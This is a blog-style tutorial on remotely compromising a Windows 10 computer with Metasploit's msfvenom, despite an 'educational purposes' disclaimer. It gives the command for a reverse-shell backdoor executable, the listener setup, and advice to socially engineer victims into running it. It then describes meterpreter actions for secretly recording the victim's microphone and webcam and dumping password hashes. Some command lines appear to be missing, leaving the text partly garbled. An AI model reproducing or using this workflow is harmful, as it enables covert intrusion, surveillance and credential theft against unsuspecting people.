When it comes to penetration and hacking, Linux would be there. Kali Linux one of the most powerful Linux version powered all the penetration testing tools. One of it’s most popular tool is Metasploit for hacking remote devices including computers, web servers and even mobile phones. It’s not that hard to hack into a remote computer with the help of Metasploit. Metasploit is terminal command base program. For beginners it’s hard to know the commands and how to execute ’em. So, if you’re newbie, you can learn most common Metasploit Commands to get you started.
Note: This article is only for ethical and educational purposes to show you how hackers do the penetration into remote systems and how to prevent them.
Hacking a Computer Remotely using Metasploit MSFVenom – Windows 10 Hacks
- Kali Linux OS
- Metasploit Framework (It’s pre-built in Kali Linux)
- Target Machine
This demonstration of hacking a Windows 10 computer is made in a Virtual Environment, which means not any actual device is harmed during the process.
If you want to try in VirtualBox, you need also the following things:
- Kali Linux VM Image
- Windows 10 Virtual Image
- Target Machine
Steps to follow for hacking a computer remotely:
- Download and install Kali linux.
- Once it’s installed, start your system and do an upgrade. Just open up a terminal and type the following command:
- Once it’s updated, run the metasploit. Open terminal and type: msfconsole.
- As Metasploit starts, first thing is to create a backdoor. Type the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe
- Replace LHOST=10.0.2.5 to your internal IP. You can check by typing ‘ifconfig’ in the terminal. You can change the location of saving the backdoor to any of your choice. I created it on Desktop.
- Next step is to use the exploit handler. This exploit handler will handle all the backdoor requests. To do that just type the following command.
set payload windows/meterpreter/reverse_tcp
- Once the exploit handler is ready, just set the exploit options.
- After setting up the listening host IP and port, just type the following command to exploit.
exploit -j -z
- Now the part of spreading your backdoor. Be a social engineer here. With just few little social engineering make the targets to install this backdoor to their PC. As someone runs your sent backdoor. A session will start in your Metasploit terminal and you’re in…
- It’s time to play with the target device. Now you can play and perform any action to the victim device. There are hundreds of operations you can perform on the remote device. Here are some of the most interesting actions you can perform on target device.
Meterpreter Commands for Remote Actions
Password : BreachSec
This command gives a live mic feed of the remote computer you’re connected to. Listen to the live conversations of the target.
It initiate a video chat with the target computer.
It’s for capturing the photos from the target device.
For streaming live video from the victim machine.
It dumps the contents of the SAM database.
You can check out all the most common Metasploit commands and meterpreter payloads.
Hope this will work for you and will make you clear how to hacking a computer remotely using Metasploit MSFVenom. If you face any problem, feel free to comment below.
Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.